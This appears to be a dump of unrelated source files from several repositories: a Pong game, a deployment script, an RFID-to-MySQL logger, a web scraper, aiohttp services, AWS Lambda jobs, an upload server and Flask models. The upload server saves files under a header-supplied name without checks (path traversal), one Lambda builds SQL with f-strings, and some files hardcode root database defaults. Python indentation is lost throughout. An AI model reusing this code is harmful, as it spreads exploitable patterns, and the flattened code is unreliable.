#### File: 0zym4ndias/PingPong/juego_pong.py
```python
import turtle
window = turtle.Screen()
window.title("Pong game by @0zym4ndias") # Game title
window.bgcolor("grey12") # Background color
window.setup(width = 800, height = 600)
window.tracer(0) # It stops the window for updating, so that the game runs smoother
# Right paddle
right_paddle = turtle.Turtle()
right_paddle.speed(0) # Speed of animation - sets it to maximum speed
right_paddle.shape("square") # Shape of the paddle
right_paddle.color("white") # The color of the paddle
right_paddle.shapesize(stretch_wid = 5, stretch_len = 1) # We stretch the square
right_paddle.penup()
right_paddle.goto(350, 0) # The initial position of the paddle
# Left paddle
left_paddle = turtle.Turtle()
left_paddle.speed(0) # Speed of animation - sets it to maximum speed
left_paddle.shape("square") # Shape of the paddle
left_paddle.color("white") # The color of the paddle
left_paddle.shapesize(stretch_wid = 5, stretch_len = 1) # We stretch the square
left_paddle.penup()
left_paddle.goto(-350, 0) # The initial position of the paddle
# Ball
ball = turtle.Turtle()
ball.speed(0) # Speed of animation - sets it to maximum speed
ball.shape("square") # Shape of the ball
ball.color("white") # The color of the ball
ball.penup()
ball.goto(0, 0) # The initial position of the ball
ball.dx = 0.1 # Horizontal distance the ball moves per update
ball.dy = 0.1 # Vertical distance the ball moves per update
# Score
score_a = 0
score_b = 0
# Score_pen
score_pen = turtle.Turtle()
score_pen.speed(0) # Animation speed
score_pen.color("white")
score_pen.penup() # This is used to avoid drawing lines when it moves
score_pen.hideturtle()
score_pen.goto(0, 250) # Where the score is located
score_pen.write("Player A: 0 | Player B: 0", align = "center", font=("Lao MN", 24, "normal"))
# Function
def left_paddle_up():
y = left_paddle.ycor() # It returns the y coordinates
y += 20 # It will go up
left_paddle.sety(y) # Set the paddle to the new y coordinate
# Function
def left_paddle_down():
y = left_paddle.ycor() # It returns the y coordinates
y -= 20 # It will go down
left_paddle.sety(y) # Set the paddle to the new y coordinate
def right_paddle_up():
y = right_paddle.ycor() # It returns the y coordinates
y += 20 # It will go up
right_paddle.sety(y) # Set the paddle to the new y coordinate
# Function
def right_paddle_down():
y = right_paddle.ycor() # It returns the y coordinates
y -= 20 # It will go down
right_paddle.sety(y) # Set the paddle to the new y coordinate
# Keyboard
window.listen() # Listen for keyboard input
window.onkeypress(left_paddle_up, "w") # The w key will make the paddle go up
window.onkeypress(left_paddle_down, "s") # The s key will make the paddle go down
window.onkeypress(right_paddle_up, "Up") # The Up arrow will make the paddle go up
window.onkeypress(right_paddle_down, "Down") # The Down arrow will make the paddle go down
# Game loop
while True:
window.update() # Every single time the loop runs the window will update the screen
# Movement of the ball
ball.setx(ball.xcor() + ball.dx)
ball.sety(ball.ycor() + ball.dy)
# Borders of the window (Up & Down)
# Top
if ball.ycor() > 290:
ball.sety(290)
ball.dy *= -1 # It will reverse the direction of the ball
# Bottom
if ball.ycor() < -290:
ball.sety(-290)
ball.dy *= -1 # It will reverse the direction of the ball
# Put the ball back on the center if it goes out
if ball.xcor() > 390:
ball.goto(0, 0) # Put ball back to the center
ball.dx *= -1 # It will reverse the direction of the ball
score_a += 1
score_pen.clear() # This is to update the score correctly
score_pen.write("Player A: {} | Player B: {}".format(score_a, score_b), align = "center", font=("Lao MN", 24, "normal"))
if ball.xcor() < -390:
ball.goto(0, 0) # Put ball back to the center
ball.dx *= -1 # It will reverse the direction of the ball
score_b += 1
score_pen.clear() # This is to update the score correctly
score_pen.write("Player A: {} | Player B: {}".format(score_a, score_b), align = "center", font=("Lao MN", 24, "normal"))
# Collisions
# This will make the ball bounce with the right paddle
if (ball.xcor() > 340 and ball.xcor() < 350) and (ball.ycor() < right_paddle.ycor() + 40 and ball.ycor() > right_paddle.ycor() - 40):
ball.setx(340) # Nudge the ball left a little so it doesn't get stuck behind the paddle
ball.dx *= -1 # Reverse the horizontal direction of the ball
# This will make the ball bounce with the left paddle
if (ball.xcor() < -340 and ball.xcor() > -350) and (ball.ycor() < left_paddle.ycor() + 40 and ball.ycor() > left_paddle.ycor() - 40):
ball.setx(-340) # Nudge the ball right a little so it doesn't get stuck behind the paddle
ball.dx *= -1 # Reverse the horizontal direction of the ball
``` |
{
"source": "0zy/magistra",
"score": 2
} |
#### File: magistra/build/push_to.py
```python
import sys
import datetime
from subprocess import call
mappings = {
"prod" : "magistra-prod",
"staging" : "magistra-staging",
"dev1" : "magistra",
"local" : ""
}
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def cprint(text, color):
print(color + text + bcolors.ENDC)
def main():
if len(sys.argv) == 1:
help()
env = sys.argv[1];
cprint("PUSH_TO_ENVIRONMENT Input Environment: "+ env, bcolors.HEADER)
orig_file = ".env"
env_file = ".env." + env
backup_file = ".env_backups/.env.backup." + str(datetime.datetime.now().strftime("%A_%d_%B_%Y_%I_%M_%p"))
cprint("Env File: " + env_file, bcolors.OKBLUE)
if check_diff(env_file):
cprint( "Backup File: " + backup_file, bcolors.OKBLUE)
call(["cp", orig_file, backup_file])
call(["cp", env_file, orig_file])
else:
cprint( "No diff found", bcolors.OKBLUE)
if env not in mappings:
print("create heroku")
call(["gulp"])
if env == "local":
call(["php", "-S", "localhost:8000", "-t", "public/"])
else:
call(["build/try.sh"])
call(["git", "reset", "HEAD" , backup_file])
call(["git", "reset", "HEAD" , orig_file])
#scale dyno
def check_diff(env_file):
cprint("<diff>", bcolors.WARNING)
orig_file = ".env"
diff = call(["diff", orig_file, env_file, "--ignore-blank-lines"])
print "Diff: " + str(diff)
cprint("</diff>", bcolors.WARNING)
return diff
def help():
print "Please pass environment [production, staging, dev1]"
sys.exit(1)
if __name__ == "__main__":
main()
``` |
{
"source": "0zyxel0/Tapper_Gate",
"score": 2
} |
#### File: Tapper_Gate/Python/Scan_Insert.py
```python
import MySQLdb,time,datetime,serial
#indicate your COMPORT
usbport = 'COM8'
ser = serial.Serial(usbport, 9600, timeout = 1000)
conn = MySQLdb.connect(host="127.0.0.1", # your host, usually localhost
user="root", # your username
passwd="", # your password
db="tapper_db") # name of the data base
x = conn.cursor()
count=0;
gate_id = 'GTONE'
tryText = '';
def saveToDatabase(a,b,c):
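# Persists a single card swipe: card id, UTC timestamp and gate id.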
x.execute("""INSERT into gate_history (card_id,createdate,gate_id) values(%s,%s,%s)""" ,(a,b,c))
conn.commit()
print "Successfully Inserted Values to Database : Card Id :"+a+", Time : "+b+ ", Gate:"+c+ "."
while count != 1:
try:
tryText = ser.readline(44);
convertToStr =str(tryText[33:]);
clean = convertToStr.rstrip('\r');
if clean.strip():
timestamp = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')
saveToDatabase(clean,timestamp,gate_id)
timestamp = None;
else:
print('Try scanning again...')
except Exception:
print("failed")
conn.rollback()
``` |
{
"source": "0zyyy/mojokcoscraper",
"score": 3
} |
#### File: 0zyyy/mojokcoscraper/scrapper.py
```python
from bs4 import BeautifulSoup as bs
import requests
from csv import DictWriter
print("Import sukses")
def scrapeWeb():
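# Asks how many listing pages of mojok.co to crawl and which section,
# then collects the title, link and author of every post found.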
halaman = int(input("Berapa halaman? "))
jenis_halam = input("Scrape halaman mana? ").lower()
all_news = []
for x in range(1,halaman + 1):
cap = requests.get(f"https://mojok.co/{jenis_halam}/page/{x}")
soup = bs(cap.text, "html.parser")
contain = soup.find(class_="jeg_postblock")
posts = contain.find_all(class_="jeg_post")
for post in posts:
uhuys = post.find(class_="jeg_post_title")
author = post.find(class_="jeg_meta_author")
all_news.append({
"Jungdul": uhuys.find("a").get_text(),
"Link": uhuys.find("a")["href"],
"Author": author.find("a").get_text()
})
# btn = soup.find(class_="next")
# print(str(len(all_news)) + " artikel ditemukan")
return all_news
news = scrapeWeb()
with open("news.csv","w") as file:
headers = ["Jungdul","Link","Author"]
csv_writer = DictWriter(file,fieldnames=headers)
csv_writer.writeheader()
for new in news:
csv_writer.writerow(new)
print("scrape success")
``` |
{
"source": "10000ms/aiohttp_mongodb_unit",
"score": 2
} |
#### File: aiohttp_mongodb_unit/server/route.py
```python
from aiohttp import web
from server.handler import user
def route():
route_list = [
web.post('/user/login', user.login),
web.post('/user/register', user.register),
web.post('/user/get_user_info', user.get_user_info),
web.post('/user/get_user_friend', user.get_user_friend),
web.post('/user/user_add_friend', user.user_add_friend),
web.post('/user/user_join_group', user.user_join_group),
web.post('/user/get_group', user.get_group),
# web.post('/user/change_group', user.change_group),
web.post('/user/create_group', user.create_group),
# web.post('/user/get_all_group', user.get_all_group),
]
return route_list
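# Typical wiring (illustrative, not part of this file):
#   app = web.Application()
#   app.add_routes(route())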
``` |
{
"source": "10000ms/aiohttp_redis_unit",
"score": 2
} |
#### File: 10000ms/aiohttp_redis_unit/main.py
```python
from multiprocessing import Process
from server import main as server_main
from reporter.reporter import main as reporter_main
def main():
server_process = Process(target=server_main)
reporter_process = Process(target=reporter_main)
server_process.start()
reporter_process.start()
server_process.join()
if __name__ == '__main__':
main()
```
#### File: aiohttp_redis_unit/server/utils.py
```python
import functools
import json
import aiohttp
from aiohttp import web
from config import config
from server.handler import error
from utils import set_logging
from redis_part import RedisConn
class ServerComponent:
logger = set_logging(config.SERVER_LOGGER_NAME)
session_db = RedisConn(
host=config.REDIS_HOST,
port=config.REDIS_PORT,
db=config.SESSION_DB
).db
message_db = RedisConn(
host=config.REDIS_HOST,
port=config.REDIS_PORT,
db=config.MESSAGE_DB
).db
remote_db = RedisConn(
host=config.REDIS_HOST,
port=config.REDIS_PORT,
db=config.REMOTE_DB
).db
async def get_json_date(request, need_len=None):
data = await request.content.read()
data = data.decode()
data = json.loads(data)
ServerComponent.logger.info(data)
if need_len is None or len(data) == need_len:
return data
def check_remote(func):
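# Decorator for sync handlers: reject requests whose remote address
# is not in config.TRUST_LIST with a 403.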
@functools.wraps(func)
def wrapper(request):
if request.remote in config.TRUST_LIST:
return func(request)
else:
return error.handle_403()
return wrapper
def async_check_remote(func):
@functools.wraps(func)
async def wrapper(request):
if request.remote in config.TRUST_LIST:
return await func(request)
else:
return error.handle_403()
return wrapper
def general_json_data(status, info_dict=None):
status_data = {'status': status}
if info_dict is not None:
info_dict.update(status_data)
else:
info_dict = status_data
return info_dict
def get_data(func):
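# Decorator for sync handlers: parse the request body as JSON and pass it in,
# answering 400 when no valid JSON payload arrives.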
@functools.wraps(func)
async def wrapper(request):
get_json = await get_json_date(request)
if get_json is not None:
return func(get_json)
else:
return error.handle_400()
return wrapper
def async_get_data(func):
@functools.wraps(func)
async def wrapper(request):
get_json = await get_json_date(request)
if get_json is not None:
return await func(get_json)
else:
return error.handle_400()
return wrapper
def ok_response():
res_data = general_json_data('ok')
return web.json_response(data=res_data)
async def fetch(session, url, data):
ServerComponent.logger.info('sending POST: ' + str(url) + str(data))
async with session.post(url, data=data) as response:
return await response.text()
async def server_aio_client(url, data):
async with aiohttp.ClientSession() as session:
ServerComponent.logger.info('starting main_reporter')
res = await fetch(session, url, data)
return res
async def get_mongo_fetch_data(data, url):
json_data = json.dumps(data)
mongo_url = \
'http://' \
+ config.MONGODB_URL['host'] \
+ ':' \
+ str(config.MONGODB_URL['port']) \
+ url
res = await server_aio_client(mongo_url, json_data)
return json.loads(res)
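# Illustrative call (payload keys assumed, path taken from the companion
# mongodb unit's routes):
#   result = await get_mongo_fetch_data({'username': 'x'}, '/user/get_user_info')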
```
#### File: aiohttp_redis_unit/test/redis_test.py
```python
import unittest
from redis_part import RedisConn
from config import config
class RedisTest(unittest.TestCase):
test_data_key = 'Test'
test_data_value = '111'
def setUp(self):
self.redis_conn = RedisConn(
host=config.REDIS_HOST,
port=config.REDIS_PORT,
db=config.SESSION_DB
)
def test_conn(self):
self.redis_conn.db.set(self.test_data_key, self.test_data_value)
test_data = self.redis_conn.db.get(self.test_data_key)
self.assertEqual(test_data, self.test_data_value)
self.redis_conn.db.delete(self.test_data_key)
def tearDown(self):
self.redis_conn.pool.disconnect()
``` |
{
"source": "10000volts/JLGLTaskList",
"score": 2
} |
#### File: JLGLTaskList/tasklist/models.py
```python
from django.db import models
from django.db.models import Q, Prefetch
from django.db import transaction
from utils.constants import TASK_STATUS, TASK_STATUS_CHOICES
class TaskList(models.Model):
name = models.CharField(verbose_name=u'task list name', max_length=128, unique=True)
def __str__(self):
return self.name
class TaskManager(models.Manager):
def create_task(self, validated_data):
"""
:param validated_data: {"name": "string"}
:return:
"""
with transaction.atomic():
tl = validated_data.pop('tl')
self.check_valid(validated_data)
validated_data['status'] = TASK_STATUS.WAITING
validated_data['tl'] = tl
item = self.create(**validated_data)
return item
def check_valid(self, data):
q = self.filter(**data).exists()
if q:
raise Exception("已存在同名任务~")
class Task(models.Model):
objects = TaskManager()
name = models.CharField(verbose_name=u'task name', max_length=128)
status = models.PositiveSmallIntegerField(u'task status', default=TASK_STATUS.WAITING,
choices=TASK_STATUS_CHOICES)
tl = models.ForeignKey('tasklist.TaskList', on_delete=models.CASCADE,
related_name='task', verbose_name='owning task list')
def __str__(self):
return "{}:{} status:{}".format(self.tl.name, self.name, self.status)
``` |
{
"source": "1000in1/test",
"score": 3
} |
#### File: 1000in1/test/server.py
```python
import http.server
import socketserver
import socket
import urllib
class HTTPServerV6(http.server.HTTPServer):
address_family = socket.AF_INET6
class ServerHTTP(http.server.BaseHTTPRequestHandler):
getHandler={}
postHandler={}
def do_GET(self):
path = self.path
#print('path:',path)
#Split the URL (GET parameters can also be extracted from it); different paths and parameters can load different HTML pages or call different handlers, which is enough for a simple site or API
query = urllib.parse.urlparse(path)
#query.hostname
#print('urlparse path',query)
#print('query',query.path)
if query.path in self.getHandler.keys():
self.getHandler[query.path](self)
else:
self.send_error(404,'not found!')
#print(urllib.parse.parse_qs(query.query))
#print(urllib.parse.parse_qsl(query.query))
def do_POST(self):
path = self.path
query = urllib.parse.urlparse(path)
if query.path in self.postHandler.keys():
self.postHandler[query.path](self)
else:
self.send_error(404,'not found!')
def init(self,p,m):
def decorator(fc):
if 'GET' in m:
self.getHandler[p]=fc
if 'POST' in m:
self.postHandler[p]=fc
#print(self.pathAction)
return decorator
#Handler = http.server.SimpleHTTPRequestHandler
@ServerHTTP.init(ServerHTTP,"/",['GET'])
def func1(self):
path = self.path
#print('path:',path)
#Split the URL (GET parameters can also be extracted from it); different paths and parameters can load different HTML pages or call different handlers, which is enough for a simple site or API
query = urllib.parse.urlparse(path)
self.send_response(200)
self.send_header("Content-type","text/html")
self.send_header("test","This is test!")
self.end_headers()
buf = '''<!DOCTYPE HTML>
<html>
<head><title>Get page</title></head>
<body>
%s
%s
</body>
</html>'''%(self.path,query.hostname)
self.wfile.write(buf.encode(encoding="utf-8"))
@ServerHTTP.init(ServerHTTP,"/",['POST'])
def func2(self):
path = self.path
print(path)
print(self.headers)
name = self.headers['n']
print(name)
cmd = self.headers['cmd']
print(cmd)
query = urllib.parse.urlparse(path)
print('query',query)
#Read the data submitted via POST
fo = open("../share/%s"%name, "wb")
le = int(self.headers['content-length'])
self.send_response(200)
self.send_header("Content-type","text/html")
self.send_header("test","This is test!")
self.end_headers()
buf = '''<!DOCTYPE HTML>
<html>
<head><title>Post page</title></head>
<body>file:%s <br />size:%d'''%(name,le)
self.wfile.write(buf.encode(encoding="utf-8"))
l = 0
while l<le:
i=1024
if l+1024>le:
i = le-l
datas = self.rfile.read(i)
l = l+len(datas)
line = fo.write( datas )
buf = '%d/%d<br>'%(l,le)
print(buf)
self.wfile.write(buf.encode(encoding="utf-8"))
fo.close()
buf = '''</body>
</html>'''
self.wfile.write(buf.encode(encoding="utf-8"))
server = HTTPServerV6(('::', 8081), ServerHTTP)
server.serve_forever()
``` |
{
"source": "1000monkeys/MastermindRedux",
"score": 3
} |
#### File: MastermindRedux/helpers/DisplayManager.py
```python
from screens.MainMenu import MainMenu
class DisplayManager:
def __init__(self, pygame, screen) -> None:
self.screen = screen
self.main_menu = MainMenu(pygame, screen)
def get_current_screen(self):
return self.main_menu
def set_current_screen(self, screen_id):
self.screen_id = screen_id
```
#### File: MastermindRedux/helpers/Screen.py
```python
import sys
class Screen:
def __init__(self) -> None:
pass
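# Subclasses are expected to provide self.pygame before handle_events runs.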
def handle_events(self, events):
for event in events:
if event.type == self.pygame.QUIT:
sys.exit()
def draw(self, screen):
pass
``` |
{
"source": "1000peach/dnd-mentee-4th-9-repo",
"score": 2
} |
#### File: deployment/lambda/lmd_get_trigger.py
```python
import os
import pymysql
from typing import List # for type annotation
from log import logger
from db import get_connection
HOST = os.environ.get('DB_HOST', '3.34.87.77')
PORT = int(os.environ.get('DB_PORT', 3306))
USER = os.environ.get('DB_USER', 'root')
TABLE = os.environ.get('DB_TABLE', 'dnd')
PASSWORD = os.environ.get('DB_PASSWORD', 'password')
COLS = ['totalViews', 'todayViews', 'id']
# TODO: How to hide this password in serverless.yml ?
TEST_QUERY = 'SELECT 1 + 1 AS result'
GET_VIEWS_QUERY = 'SELECT id, totalViews, yesterDayViews, todayViews FROM plants WHERE 1=1'
def get_all_views(cursor: pymysql.connections.Connection.cursor) -> List[dict]:
try:
cursor.execute(GET_VIEWS_QUERY)
return cursor.fetchall()
except Exception as e:
logger.info(f'failed to fetch :{e}')
return []
def handler(event, context):
logger.info("this lambda has been invoked ")
logger.info(event)
conn = get_connection(HOST, PORT, USER, PASSWORD, TABLE)
with conn.cursor() as cur:
views = get_all_views(cur)
logger.info(views)
for v in views:
total_view, today_view, id = map(lambda x : v.get(x), COLS)
cur.execute(f'UPDATE plants SET totalViews = {total_view + today_view}, todayViews = {0}, yesterDayViews = {today_view} WHERE id={id}')
try:
conn.commit() # commit.
except Exception as e:
logger.info(f'error occurred while commit: {e}')
if __name__ == "__main__":
conn = get_connection(HOST, PORT, USER, PASSWORD, TABLE)
with conn.cursor() as cur:
origin_views = get_all_views(cur)
# print(result)
for v in origin_views:
total_view, today_view, id = map(lambda x : v.get(x), COLS)
cur.execute(f'UPDATE plants SET totalViews = {total_view + today_view}, todayViews = {0}, yesterDayViews = {today_view} WHERE id={id}')
result = conn.commit() # commit.
print(result)
```
#### File: deployment/lambda/lmd_trigger.py
```python
import boto3
import os
import datetime
import time
import json
TRIGGERD_LAMDA = os.environ.get('TRIGGERD_LAMBDA', 'dnd-4th-9-seeat-batch-lambda-cron-get-trigger')
lmd = boto3.client('lambda')
def timenow_dt_strftime():
time_now = time.time()
dt = datetime.datetime.fromtimestamp(time_now)
return dt.strftime('%Y-%m-%d-%H-%M')
def handler(event, context):
print('lambda invoked ! ')
print(f'invoked time : {timenow_dt_strftime()}')
try:
lmd.invoke(
FunctionName=TRIGGERD_LAMDA,
            InvocationType='Event', Payload=json.dumps({'dt' : timenow_dt_strftime()}) # this is a dummy payload
)
except Exception as e:
print(f'error occured when triggering lambda : {e}')
``` |
{
"source": "1000Springs/web-app",
"score": 2
} |
#### File: web-app/hotspringsapp/models.py
```python
from hotspringsapp import app,db
from werkzeug.security import generate_password_hash, check_password_hash
from sqlalchemy.sql import text
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.orm import sessionmaker
class Location(db.Model):
__tablename__ = 'public_location'
id = db.Column(db.Integer, primary_key=True)
feature_name = db.Column(db.String(50))
feature_system = db.Column(db.String(50))
district = db.Column(db.String(50))
location = db.Column(db.String(50))
lat = db.Column(db.Float)
lng = db.Column(db.Float)
description = db.Column(db.String(200))
private = db.Column(db.Boolean)
access = db.Column(db.String(15))
feature_type = db.Column(db.String(50))
def latestSample(self):
return Sample.query.filter(Location.id == self.id, Sample.location_id == Location.id ).order_by(Sample.location_id,Sample.date_gathered.desc()).first()
@staticmethod
def latestSampleIdsAllLocations():
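        # One id per location: the sample whose date_gathered matches that
        # location's most recent sampling date.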
query = text('select id from public_sample s where s.date_gathered = (select max(date_gathered) from public_sample where location_id = s.location_id limit 1 )')
rows = db.engine.execute(query).fetchall()
sample_ids = []
for row in rows:
sample_ids.append(row[0])
return sample_ids
def __init__(self,location_id,fName,latPos,lngPos,fSystem,dist,loc,desc,private,access):
self.id = location_id
self.feature_name = fName
self.feature_system = fSystem
self.district = dist
self.location = loc
self.lat = latPos
self.lng = lngPos
self.description = desc
self.private = private
self.access = access
def __repr__(self):
return '<Location {0} {1}>'.format(self.id,self.feature_name)
class Physical_data(db.Model):
__tablename__ = 'public_physical_data'
id = db.Column(db.Integer, primary_key=True)
initialTemp = db.Column(db.Float)
sampleTemp = db.Column(db.Float)
pH = db.Column(db.Float)
redox = db.Column(db.Float)
dO = db.Column(db.Float)
conductivity = db.Column(db.Float)
size = db.Column(db.String(20))
colour = db.Column(db.String(7))
ebullition = db.Column(db.String(50))
turbidity = db.Column(db.Float)
dnaVolume = db.Column(db.Float)
ferrousIronAbs = db.Column(db.Float)
def __init__(self, phys_id,iTemp,sTemp,ph,red,dis_ox,cond,date,size,colour,ebul,turb,dnaVol,ferIron):
self.id = phys_id
self.initialTemp = iTemp
self.pH = ph
self.redox = red
self.dO = dis_ox
self.conductivity = cond
self.size = size
self.colour = colour
self.ebullition = ebul
self.turbidity = turb
self.dnaVolume = dnaVol
self.ferrousIronAbs = ferIron
self.date_gathered = date
self.sampleTemp = sTemp
class Sample_Taxonomy(db.Model):
__tablename__ = 'public_sample_taxonomy'
id = db.Column(db.Integer, primary_key=True)
sample_id = db.Column( db.Integer, db.ForeignKey('public_sample.id'))
taxonomy_id = db.Column(db.Integer, db.ForeignKey('public_taxonomy.id'))
read_count = db.Column(db.Integer)
sample = db.relationship("Sample",backref="Sample_Taxonomy", lazy="select")
taxon = db.relationship("Taxonomy",backref="Sample_Taxonomy", lazy="joined")
class Taxonomy(db.Model):
__tablename__ = 'public_taxonomy'
id = db.Column(db.Integer, primary_key=True)
domain = db.Column(db.String(100), nullable=True)
phylum = db.Column(db.String(100), nullable=True)
Class = db.Column(db.String(100), nullable=True)
# read_count = db.Column(db.Integer, nullable=True)
def __getitem__(self,index):
return getattr(self,index)
class Sample(db.Model):
__tablename__ = 'public_sample'
id = db.Column(db.Integer, primary_key=True)
date_gathered = db.Column(db.DateTime, nullable=False)
sampler = db.Column(db.String(50), nullable=False)
sample_number = db.Column(db.String(50), nullable=False)
location_id = db.Column(db.Integer, db.ForeignKey("public_location.id"))
phys_id = db.Column(db.Integer, db.ForeignKey("public_physical_data.id"))
chem_id = db.Column(db.Integer, db.ForeignKey("public_chemical_data.id"))
location = db.relationship("Location",backref="Sample",lazy="select")
phys = db.relationship("Physical_data",backref="Sample",lazy="select")
image = db.relationship("Image",backref="Sample",lazy="select" , uselist=True)
chem = db.relationship("Chemical_data",backref="Sample",lazy="select")
samp_taxon = db.relationship("Sample_Taxonomy",backref="Sample",lazy="select")
taxon = association_proxy('samp_taxon', 'taxon')
def __init__(self,id,date,location,physID,chemID,sampleNum):
self.id = id
self.date_gathered = date
self.location_id = location
self.phys_id = physID
self.chem_id = chemID
self.sample_number = sampleNum
def getTaxonomy(self):
# Queries of views without primary keys don't fit very well in the
# SQLAlchemy ORM, so query the DB with raw SQL
column_names = ["read_count", "domain", "phylum", "class", "order", "family", "genus", "species"]
query = text(
'select `' + ('`,`'.join(column_names)) + '` from public_confident_taxonomy where sample_id = :sample_id' +
' order by `'+ ('`,`'.join(column_names[1:])) +'`'
)
rows = db.engine.execute(query, sample_id=self.id).fetchall()
return [dict(zip(column_names,row)) for row in rows]
def hasTaxonomy(self):
query = text(
'select * from public_sample_taxonomy where sample_id = :sample_id limit 1'
)
rows = db.engine.execute(query, sample_id=self.id).fetchall()
return len(rows) > 0
def __repr__(self):
return '<Sample {0} {1} {2}>'.format(self.id,self.location_id,self.date_gathered)
class Image(db.Model):
__tablename__ = 'public_image'
id = db.Column(db.Integer, primary_key=True)
sample_id = db.Column(db.Integer, db.ForeignKey("public_sample.id"), nullable=False)
image_path = db.Column(db.String (150), nullable = False)
image_type = db.Column(db.String (150))
def __init__(self,id,sid,iPath,iName):
self.id = id
self.sample_id = sid
self.image_path = iPath
self.image_name = iName
class User(db.Model):
username = db.Column(db.String(100), primary_key=True)
password = db.Column(db.String(100))
def __init__(self,username,password):
self.username = username
self.password = password
def check_password(self, password):
return check_password_hash(self.password,password)
class Chemical_data(db.Model):
__tablename__ = 'public_chemical_data'
id = db.Column(db.Integer, primary_key=True)
Li = db.Column(db.Float)
B = db.Column(db.Float)
N = db.Column(db.Float)
Na = db.Column(db.Float)
P = db.Column(db.Float)
Cl = db.Column(db.Float)
C = db.Column(db.Float)
Al = db.Column(db.Float)
Si = db.Column(db.Float)
K = db.Column(db.Float)
Ca = db.Column(db.Float)
V = db.Column(db.Float)
Cr = db.Column(db.Float)
Fe = db.Column(db.Float)
Mn = db.Column(db.Float)
cobalt = db.Column(db.Float)
Ni = db.Column(db.Float)
Cu = db.Column(db.Float)
Zn = db.Column(db.Float)
Mg = db.Column(db.Float)
As = db.Column(db.Float)
Se = db.Column(db.Float)
Br = db.Column(db.Float)
Sr = db.Column(db.Float)
Mo = db.Column(db.Float)
Ag = db.Column(db.Float)
Cd = db.Column(db.Float)
In = db.Column(db.Float)
Ba = db.Column(db.Float)
La = db.Column(db.Float)
Ti = db.Column(db.Float)
Pb = db.Column(db.Float)
Bi = db.Column(db.Float)
U = db.Column(db.Float)
CH4 = db.Column(db.Float)
H2S = db.Column(db.Float)
H2 = db.Column(db.Float)
CO = db.Column(db.Float)
nitrate = db.Column(db.Float)
nitrite = db.Column(db.Float)
ammonium = db.Column(db.Float)
sulfate = db.Column(db.Float)
chloride = db.Column(db.Float)
phosphate = db.Column(db.Float)
iron2 = db.Column(db.Float)
bicarbonate = db.Column(db.Float)
thallium = db.Column(db.Float)
    def returnElements(self):
        element_names = [
            "Li", "B", "N", "Na", "P", "Cl", "C", "Al", "Si", "K", "Ca", "V",
            "Cr", "Fe", "Mn", "cobalt", "Ni", "Cu", "Zn", "Mg", "As", "Se",
            "Br", "Sr", "Mo", "Ag", "Cd", "In", "Ba", "La", "Ti", "Pb", "Bi", "U",
        ]
        # Same [name, value] pairs as before, built in one pass.
        return [[name, getattr(self, name)] for name in element_names]
def returnGases(self):
gases = []
gases.append(["CH4",self.CH4])
gases.append(["H2S",self.H2S])
gases.append(["H2",self.H2])
gases.append(["CO",self.CO])
return gases
def returnCompounds(self):
compounds = []
compounds.append(["nitrate",self.nitrate])
compounds.append(["nitrite",self.nitrite])
compounds.append(["ammonium",self.ammonium])
compounds.append(["sulfate",self.sulfate])
compounds.append(["chloride",self.chloride])
compounds.append(["phosphate",self.phosphate])
compounds.append(["iron2",self.iron2])
compounds.append(["bicarbonate",self.bicarbonate])
return compounds
def __getitem__(self,index):
return getattr(self,index)
``` |
{
"source": "1000teslas/sel4cp",
"score": 3
} |
#### File: 1000teslas/sel4cp/build_sdk.py
```python
from argparse import ArgumentParser
from os import popen, system
from shutil import copy
from pathlib import Path
from dataclasses import dataclass
from sys import executable
from tarfile import open as tar_open, TarInfo
from typing import Dict, Union, List, Tuple
NAME = "sel4cp"
VERSION = "1.2.6"
ENV_BIN_DIR = Path(executable).parent
SEL4CP_EPOCH = 1616367257
KERNEL_CONFIG_TYPE = Union[bool, str]
KERNEL_OPTIONS = Dict[str, KERNEL_CONFIG_TYPE]
@dataclass
class BoardInfo:
name: str
gcc_cpu: str
loader_link_address: int
kernel_options: KERNEL_CONFIG_TYPE
examples: Dict[str, Path]
@dataclass
class ConfigInfo:
name: str
debug: bool
kernel_options: KERNEL_CONFIG_TYPE
SUPPORTED_BOARDS = (
BoardInfo(
name="tqma8xqp1gb",
gcc_cpu="cortex-a35",
loader_link_address=0x80280000,
kernel_options = {
"KernelPlatform": "tqma8xqp1gb",
"KernelIsMCS": True,
"KernelArmExportPCNTUser": True,
},
examples = {
"ethernet": Path("example/tqma8xqp1gb/ethernet")
}
),
BoardInfo(
name="zcu102",
gcc_cpu="cortex-a53",
loader_link_address=0x40000000,
kernel_options = {
"KernelPlatform": "zynqmp",
"KernelARMPlatform": "zcu102",
"KernelIsMCS": True,
"KernelArmExportPCNTUser": True,
},
examples = {
"hello": Path("example/zcu102/hello")
}
)
)
SUPPORTED_CONFIGS = (
ConfigInfo(
name="release",
debug=False,
kernel_options = {},
),
ConfigInfo(
name="debug",
debug=True,
kernel_options = {
"KernelDebugBuild": True,
"KernelPrinting": True,
"KernelVerificationBuild": False
}
),
)
def tar_filter(tarinfo: TarInfo) -> TarInfo:
"""This is used to change the tarinfo when created the .tar.gz archive.
This ensures the tar file does not leak information from the build environment.
"""
# Force uid/gid
tarinfo.uid = tarinfo.gid = 0
tarinfo.uname = tarinfo.gname = "sel4cp"
# This is unlikely to be set, but force it anyway
tarinfo.pax_headers = {}
tarinfo.mtime = SEL4CP_EPOCH
assert tarinfo.isfile() or tarinfo.isdir()
# Set the permissions properly
if tarinfo.isdir():
tarinfo.mode = tarinfo.mode & ~0o777 | 0o557
if tarinfo.isfile():
if "/bin/" in tarinfo.name:
# Assume everything in bin should be executable.
tarinfo.mode = tarinfo.mode & ~0o777 | 0o755
else:
tarinfo.mode = tarinfo.mode & ~0o777 | 0o644
return tarinfo
def test_tool() -> None:
r = system(
f"{executable} -m unittest discover -s tool -v"
)
assert r == 0
def build_tool(tool_target: Path) -> None:
pyoxidizer = ENV_BIN_DIR / "pyoxidizer"
if not pyoxidizer.exists():
raise Exception("pyoxidizer does not appear to be installed in your Python environment")
r = system(
f"{pyoxidizer} build --release --path tool --target-triple x86_64-unknown-linux-musl"
)
assert r == 0
tool_output = "./tool/build/x86_64-unknown-linux-musl/release/install/sel4cp"
r = system(f"strip {tool_output}")
assert r == 0
copy(tool_output, tool_target)
def build_sel4(
sel4_dir: Path,
root_dir: Path,
build_dir: Path,
board: BoardInfo,
config: ConfigInfo,
) -> None:
"""Build seL4"""
build_dir = build_dir / board.name / config.name / "sel4"
